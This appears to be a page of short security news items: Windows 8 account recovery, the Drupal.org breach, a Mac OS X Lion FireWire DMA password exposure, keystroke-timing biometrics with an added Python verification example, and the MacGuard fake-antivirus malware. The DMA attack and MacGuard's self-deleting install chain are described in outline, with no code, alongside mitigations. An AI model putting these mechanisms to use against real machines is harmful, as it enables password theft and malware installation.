If your Windows Live ID password is lost or stolen, Windows 8 will include a number of safety features designed to detect compromise and limit account usage until you can recover access. For instance, users can request that a confirmation code be sent to a mobile phone number or email address registered with Windows Live. Also, even if your credentials are compromised, you will still have full access to your PC, since Windows 8 will accept the last password successfully used to log on to the system.
Microsoft says it will also offer a number of "convenience" sign-in methods such as Picture Password and biometrics; it did not go into details but promised to do so in a future update.


For more information and further details Click Here





Drupal.org Hacked ! More Than 967,000 Registered User Details Compromised


Drupal, one of the most famous and widely used open-source content management frameworks, has fallen victim to cyber criminals. The Drupal Security Team and Infrastructure Team discovered unauthorized access to account information on the official Drupal website and on groups.drupal.org. The breach exposed the user names, countries and email addresses, along with the hashed passwords, of more than 967,000 registered users of Drupal.org. A small relief is that the breach did not reach the credit card details stored on the same server.

According to the security release, the unauthorized access was made via third-party software installed on the Drupal.org server infrastructure and was not the result of a vulnerability within Drupal itself. The Drupal team has worked with the vendor to confirm that it is a known vulnerability that has been publicly disclosed. They are still investigating and will share more detail when appropriate. Upon discovering the files during a security audit, the security team shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and found that user account information had been accessed via this vulnerability. The suspicious files may have exposed profile information such as username, email address, hashed password and country. In addition to resetting your password on Drupal.org, the team recommends a number of measures (below) to further protect your information, including changing or resetting passwords on other sites where you may use similar passwords.

As a precautionary measure following the breach, the Drupal Security Team has reset all Drupal.org account holder passwords and is requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps.
  1. Go to https://drupal.org/user/password 
  2. Enter your username or email address. 
  3. Check your email and follow the link to enter a new password. It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.
Drupal has also described the counter measures it has taken to avoid such a mishap. As attacks on high-profile sites (regardless of the software they are running) are common, Drupal strives to continuously improve the security of all Drupal.org sites. To that end, Drupal has taken the following steps to secure the Drupal.org infrastructure:
  • Staff at the OSU Open Source Lab (where Drupal.org is hosted) and the Drupal.org infrastructure teams rebuilt the production, staging and development webheads, and GRSEC secure kernels were added to most servers
  • Drupal is scanning for malicious or dangerous files, has not found any additional ones, and is making scanning a routine part of its process
  • There are many subsites on Drupal.org, including older sites for specific events. Drupal created static archives of those sites.

This security breach of Drupal, which affected more than 967,000 users, is a reminder of the recent history of breaches, in which we have seen a slew of attacks against sites such as Scribd, Guild Wars 2, Gamigo, Blizzard, Yahoo, LinkedIn, eHarmony, Formspring, Android Forums, Nvidia, Philips, Zynga, VMware, Adobe, Twitter, the New York Times, Apple and so on.








Mac OS X Lion Login Password Vulnerability



A password recovery company has advised users of Mac OS X Lion to disable the 'automatic login' feature of the operating system from Apple (NASDAQ:AAPL) due to a vulnerability that was discovered recently.
According to Passware, which provides password recovery software to law enforcement organizations, the recently released Mac OS X Lion exposes the login password whenever the Mac is in sleep mode or is locked. The same issue also affects the earlier version of the OS from Apple, Snow Leopard.
The company indicated that an attacker needs physical access to the Mac's FireWire port in order to retrieve the password from RAM through direct memory access (DMA). Sales of the latest OS from Apple started a week ago at the App Store with a price tag of $30. Apple has pointed out that Mac OS X Lion provides numerous new features.

Fortunately, users can mitigate this issue by disabling the automatic login feature on Mac OS X Lion. Users can also opt to shut down the computer, since the password is no longer held in memory once the computer is turned off. The FireWire port can also be disabled to guard against this vulnerability on Mac OS X Lion.
The company also indicated that its newest offering, Passware Kit Forensic, will be able to exploit the vulnerability on Mac OS X Lion, since the software reportedly recovers the login password.
When the automatic login feature is disabled, the computer remains secured even though the password is recoverable while the Mac is in sleep mode. With the automatic login feature enabled in Mac OS X Lion, anyone who sits down at the computer can access the device.
Users will have to type their password into the computer using their profile in order to disable the automatic login feature of Mac OS X Lion. Passware has indicated that it has already used the same method of accessing apparently secured data to decrypt some hard drives that were encrypted using TrueCrypt and BitLocker.


Hacking can now be made useless



Hackers can now be discouraged from hacking into user accounts despite having access to passwords, reveals new Lebanese research.
According to Key-Pattern Analysis (KPA), a new approach developed by the American University of Beirut, a password stolen by hackers can be made ineffective. KPA scrutinises the speed with which a user taps the keys as well as measuring the gaps between keystrokes, the beat of their typing.
The result is a biometric profile of the way each individual user types their password. If the biometric profile does not match the user, then the password fails even if it is "correct," reports the International Journal of Internet Technology and Secured Transactions.
However, Ravel Jabbour, Wes Masri and Ali El-Hajj at the university point out that a modified keyboard would be inconvenient for an organization or individual, according to a Beirut statement.
So the team instead has incorporated "intra" timing, which measures how long each key remains pressed; this gives them the beat of the typing and is a much more robust parameter.
The programme gathers information about how users type their password by recording the electronic signals from a standard keyboard as keys are pressed and released.
The programme then compares the pattern of the password as typed with a pre-stored pattern recorded when the account was initially set up.
Users would be expected to type their password repeatedly at the registration stage to record a reproducible typing pattern that can later be used to permit a log-in.
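The enrolment-and-verification flow described above, as an added example that is not the AUB researchers' code: it derives "intra" (dwell) and "inter" (flight) timings from press/release timestamps, builds a profile from repeated typings at registration, and rejects a login whose rhythm deviates from that profile even when the password itself is correct. The password, event timestamps and tolerances are all constructed for illustration.

```python
from statistics import mean, pstdev

def timings(events):
    """events: (key, press_ms, release_ms) tuples in typing order. Returns the
    dwell time of each key ("intra" timing: how long it stays pressed) followed
    by the flight time between consecutive keys (release to next press)."""
    dwell = [r - p for _, p, r in events]
    flight = [events[i + 1][1] - events[i][2] for i in range(len(events) - 1)]
    return dwell + flight

def enroll(samples):
    """Registration: per-feature mean and std over repeated typings of the
    password. The std is floored at 5 ms so a very consistent enroller does
    not get an impossibly tight template."""
    cols = zip(*(timings(s) for s in samples))
    return [(mean(c), max(pstdev(c), 5.0)) for c in cols]

def matches(template, attempt, z_max=3.0, max_outliers=1):
    """Rhythm check: accept unless more than max_outliers features sit more
    than z_max standard deviations from the enrolled profile."""
    feats = timings(attempt)
    if len(feats) != len(template):
        return False
    bad = sum(abs(x - m) / s > z_max for x, (m, s) in zip(feats, template))
    return bad <= max_outliers

def login(password, template, typed, attempt):
    """The typed password must be correct AND its rhythm must match."""
    return typed == password and matches(template, attempt)

def make_events(keys, dwells, flights):
    """Constructed helper: turn dwell/flight lists (ms) into event tuples."""
    events, t = [], 0
    for i, (k, d) in enumerate(zip(keys, dwells)):
        events.append((k, t, t + d))
        t += d + (flights[i] if i < len(flights) else 0)
    return events

# Constructed enrollment data for the (hypothetical) password "secret".
KEYS = list("secret")
TEMPLATE = enroll([
    make_events(KEYS, [90, 85, 95, 88, 92, 87], [120, 140, 110, 130, 125]),
    make_events(KEYS, [95, 88, 90, 92, 90, 85], [125, 135, 115, 128, 120]),
    make_events(KEYS, [88, 90, 93, 85, 95, 90], [118, 142, 112, 132, 122]),
])
# The owner logging in, and someone who knows the password but types it slowly.
OWNER_LOGIN = make_events(KEYS, [92, 86, 94, 90, 91, 88], [122, 138, 113, 129, 124])
IMPOSTOR_LOGIN = make_events(KEYS, [150, 160, 140, 155, 165, 150], [300, 280, 320, 290, 310])
```

In practice the template would be stored per account and refreshed over time, since a user's rhythm drifts; the fixed tolerances here only illustrate the decision rule.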


New MacGuard Phishing Attack Bypasses Mac OS X Password Requirement


A new MacDefender variant targeting Apple (NSDQ:AAPL)'s Mac OS X platform now can circumvent the password requirement to install fake antivirus software onto victims' computers.
The latest version of the fake antivirus MacDefender, known as MacGuard, was first detected by researchers at Mac security firm Intego. Unlike other versions of Mac Defender, MacGuard bypasses password requirements, and automatically installs without any user intervention.
Intego researchers first detected a fake antivirus attack with Mac Defender targeting the Mac OS X platform May 2. Like other fake antivirus schemes, known as scareware, the virus appeared on users' Macs via a pop-up or an infected link, offering a phony virus scan. The fake scan would inevitably claim to find a virus, and then would trick the user into submitting credit card numbers in exchange for bogus antivirus software.
Since it was first discovered earlier this month, differently named versions of the MacDefender virus have emerged, such as MacProtector and MacSecurity. Up until now, the different versions have been the same application under different names.
However, the new MacGuard, which is spread via SEO poisoning attacks, functions slightly differently. Initially, the installation package, known as avSetup.pkg, is downloaded automatically when a user visits a malicious or infected site, typically via an SEO poisoning attack.
If Safari's "Open safe files after downloading" feature is checked, the payload will open Apple's Installer and the user will see a standard installation screen, Intego researchers said. If not, users could see a downloaded ZIP archive and feel inclined to double click, which would also launch the Mac OS Installer.
The package then installs a downloader, dubbed avRunner, which then launches automatically while the installation package deletes itself from the user's Mac, essentially erasing its tracks.
"Unlike the previous variants of this fake antivirus, no administrator's password is required to install this program," Intego researchers said in an advisory. "Since any user with an administrator's account -- the default if there is just one user on a Mac -- can install software in the Applications folder, a password is not needed."
The downloader then installs the new MacDefender version, MacGuard, which the avRunner application fetches from an IP address hidden in an image file.
Intego researchers say that users should be wary of Web pages that appear to be a Finder window.
"Leave the page, and quit your Web browser. If anything has downloaded, and the Installer application has opened, quit it right away; look in your Downloads folder for the file, then delete it," Intego said.
Apple issued an advisory earlier this week warning users of the MacDefender virus, saying that "In the coming days, Apple will deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants."
Security experts question how Apple will keep up with what appears to be a constant stream of MacDefender variants -- a tactic which emulates the myriad of fake antivirus attacks on the Windows platform.

